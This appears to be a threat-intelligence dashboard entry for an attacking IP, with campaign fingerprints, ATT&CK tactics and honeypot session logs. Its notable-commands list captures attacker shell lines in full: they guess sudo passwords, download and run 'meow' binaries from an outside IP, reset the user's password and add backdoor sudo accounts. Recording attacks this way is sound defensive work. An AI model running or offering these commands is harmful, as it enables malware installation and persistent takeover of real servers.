← Back to feed
Location
🇺🇸 US / Washington
ASN
AS396982 · Google LLC
Cloud Provider
—
Total Events
311
Above average by volume
Agent Count
1
First / Last Seen
2026-06-01 04:42 — 2026-06-01 04:46
Attack Types
MITRE ATT&CK Techniques
Initial Access
Execution
Defense Evasion
Command and Control
External Corroboration
Blocklist.de
blocklist_de:reported
DShield Top Attackers
dshield:top_attacker
Campaigns
HASSH 16443846184e… — SSH-2.0-Go (92 IPs, 18 countries)
HASSH
Active
high
🇺🇸 US
92 IPs
71063 events
mysql:bruteforcessh:bruteforce
2026-02-22 — ongoing · 92 IPs are running an identical SSH client (HASSH fingerprint 16443846184e…). Top network: Network Solutions, LLC (AS19871). Geographic …
AS396982 Google LLC
ASN
Active
medium
🇧🇪 BE
96 IPs
8657 events
ftp:bruteforcehttp:scanmysql:bruteforcessh:bruteforce
2026-02-18 — ongoing · 96 IPs from the same network (Google LLC, AS396982) were active during overlapping time periods. Temporal correlation across …
Session Forensics
Sessions
13 (9 with login)
Avg Depth Score
0.57
Commands Executed
142
Files Downloaded
1
Notable Commands
- echo 'Password' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):Password > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):Password > /tmp/mew)
- whoami
- cd /tmp
- ulimit -n 1020000
- rm -rf meow*
- wget http://35.237.91.38/meow
- curl -O http://35.237.91.38/meow
- chmod 777 meow
- ./meow
- echo '123456789' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):123456789 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):123456789 > /tmp/mew)
- echo '111111' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):111111 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):111111 > /tmp/mew)
- echo '112233' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):112233 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):112233 > /tmp/mew)
- echo '000000' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):000000 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):000000 > /tmp/mew)
- echo '1234' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):1234 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):1234 > /tmp/mew)
Fingerprints
HASSH
SSH Client
Evidence Timeline
Interactive Operator
aa13fb1e850b
LOGIN
28
1
90%
Loading events...
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo 'Password' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000…$ whoami$ whoami$ cd /tmp$ ulimit -n 1020000
Interactive Operator
516115bda449
LOGIN
28
1
90%
Loading events...
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo '123456789' | sudo -S sh -c 'cd /tmp; ulimit -n 102000…$ whoami$ whoami$ cd /tmp$ ulimit -n 1020000
Malware Dropper
46a0fc76d2e9
LOGIN
26
1
1
100%
Loading events...
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo '111111' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; …$ whoami$ whoami$ cd /tmp$ ulimit -n 1020000
Interactive Operator
a253f5c63d3f
LOGIN
28
1
90%
Loading events...
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo '112233' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; …$ whoami$ whoami$ cd /tmp$ ulimit -n 1020000
Reconnaissance
ea333e16b62b
LOGIN
4
1
60%
Loading events...
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo '000000' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; …$ whoami$ whoami$ cd /tmp
Interactive Operator
b548d75475f8
LOGIN
28
1
90%
Loading events...
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo '1234' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm…$ whoami$ whoami$ cd /tmp$ ulimit -n 1020000
Scanner
babc7f8aa599
15%
Loading events...
SSH-2.0-Go